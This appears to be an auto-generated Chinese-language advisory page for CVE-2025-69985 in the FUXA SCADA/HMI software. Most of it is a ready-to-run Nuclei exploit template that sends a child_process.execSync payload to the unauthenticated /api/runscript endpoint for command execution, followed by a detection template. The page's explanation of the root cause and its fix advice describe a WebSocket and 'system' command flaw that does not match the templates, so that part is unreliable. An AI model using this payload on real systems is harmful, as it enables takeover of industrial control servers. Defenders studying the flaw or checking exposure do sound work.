[webapps] FUXA 1.2.8 - Authentication Bypass + RCE Exploit
CVE-2025-69985
FUXA 1.2.8 存在身份认证绕过漏洞,导致未经授权的攻击者可执行远程代码。
Critical · CVSS 9.8📋 漏洞基础信息
| CVE | CVE-2025-69985 |
|---|---|
| 漏洞类型 | 身份认证绕过 + 远程代码执行 |
| 受影响版本 | FUXA <= 1.2.8 |
| 危害等级 | Critical · CVSS 9.8 |
| 发布日期 | 2026-04-30 |
| 提交者 | Joshua van der Poll (https://github.com/joshuavanderpoll/) |
| 来源 | Exploit-DB 原文 ↗ |
🔬 漏洞根因
FUXA WebSocket 服务未对会话进行有效认证。攻击者可通过伪造 WebSocket 请求绕过登录,并利用内置的 `system` 命令执行接口实现 RCE。
🎯 攻击场景
1. 攻击者直接向 FUXA 的 WebSocket 端口发送伪造的认证握手包。2. 成功绕过身份验证后,构造包含 `system` 指令的 JSON 数据包进行命令注入。3. 服务器执行攻击者指定的操作命令,达到远程代码执行效果。
💥 漏洞影响
攻击者可绕过认证获得服务器控制权,执行任意操作系统命令,导致完全接管服务、数据泄露或进一步内网渗透。
⚔️ Nuclei Exploit 模板
以下为标准 Nuclei v3 格式的利用模板,可直接用于漏洞验证:
id: CVE-2025-69985-exploit
info:
name: FUXA <= 1.2.8 - Authentication Bypass + RCE Exploit
author: nuclei-template-generator
severity: critical
description: |
FUXA <= 1.2.8 is vulnerable to authentication bypass on the /api/runscript endpoint.
An unauthenticated attacker can send a crafted JavaScript payload using
child_process.execSync to achieve full remote command execution without authentication.
CVE-2025-69985
reference:
- https://github.com/frangoteam/FUXA/tree/v1.2.8
- https://github.com/joshuavanderpoll/CVE-2025-69985
tags: cve,cve2025,fuxa,scada,auth-bypass,rce,exploit
variables:
cmd: "id"
http:
- raw:
- |
POST /api/runscript HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
Referer: {{BaseURL}}/fuxa
Connection: close
{"params":{"script":{"parameters":[],"mode":"","id":"exploit","name":"exploit","code":"const cp = require(\"child_process\");\ntry {\n const result = cp.execSync(\"{{cmd}}\", { encoding: \"utf8\" });\n return result.toString();\n} catch (err) {\n return \"ERROR: \" + err.message + (err.stdout ? \"\\nSTDOUT: \" + err.stdout.toString() : \"\") + (err.stderr ? \"\\nSTDERR: \" + err.stderr.toString() : \"\");\n}","test":"const cp = require(\"child_process\");\ntry {\n const result = cp.execSync(\"{{cmd}}\", { encoding: \"utf8\" });\n return result.toString();\n} catch (err) {\n return \"ERROR: \" + err.message + (err.stdout ? \"\\nSTDOUT: \" + err.stdout.toString() : \"\") + (err.stderr ? \"\\nSTDERR: \" + err.stderr.toString() : \"\");\n}"},"toLogEvent":false}}
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "uid=[0-9]+\\([a-zA-Z0-9_-]+\\)\\s+gid=[0-9]+"
part: body
extractors:
- type: regex
name: rce-output
part: body
regex:
- "uid=[0-9]+\\([^)]+\\)[^\n]*"🔍 Nuclei Detection 模板
以下为漏洞探测模板,用于判断目标是否受影响:
id: CVE-2025-69985-detection
info:
name: FUXA <= 1.2.8 - Authentication Bypass Detection
author: nuclei-template-generator
severity: critical
description: |
Detects FUXA web-based SCADA/HMI software version <= 1.2.8 which is vulnerable to
authentication bypass allowing unauthenticated access to the /api/runscript endpoint
(CVE-2025-69985).
reference:
- https://github.com/frangoteam/FUXA/tree/v1.2.8
- https://github.com/joshuavanderpoll/CVE-2025-69985
tags: cve,cve2025,fuxa,scada,auth-bypass,detection
http:
- method: GET
path:
- "{{BaseURL}}/"
- "{{BaseURL}}/fuxa"
- "{{BaseURL}}/api/settings"
stop-at-first-match: false
matchers-condition: or
matchers:
- type: word
name: fuxa-ui
words:
- "FUXA"
- "fuxa"
- "frangoteam"
condition: or
part: body
- type: word
name: fuxa-api
words:
- "\"version\""
- "fuxa"
condition: and
part: body
- method: POST
path:
- "{{BaseURL}}/api/runscript"
headers:
Content-Type: application/json
Referer: "{{BaseURL}}/fuxa"
body: |
{"params":{"script":{"parameters":[],"mode":"","id":"probe","name":"probe","code":"return 1+1;","test":"return 1+1;"},"toLogEvent":false}}
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "2"
part: body
negative: false
extractors:
- type: regex
name: runscript-response
part: body
regex:
- ".*"🛡️ 修复建议
升级至 FUXA > 1.2.8 版本;临时措施:在 WebSocket 握手阶段增加 Token 校验,并限制 `system` 命令调用的来源 IP 或用户角色。
📎 参考链接
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69985
- https://www.exploit-db.com/exploits/52039
- Exploit-DB 原文
⚠️ 本文基于公开漏洞数据库,仅供安全研究与防御参考。生成时间: 2026-05-07 05:40 | 来源: Exploit-DB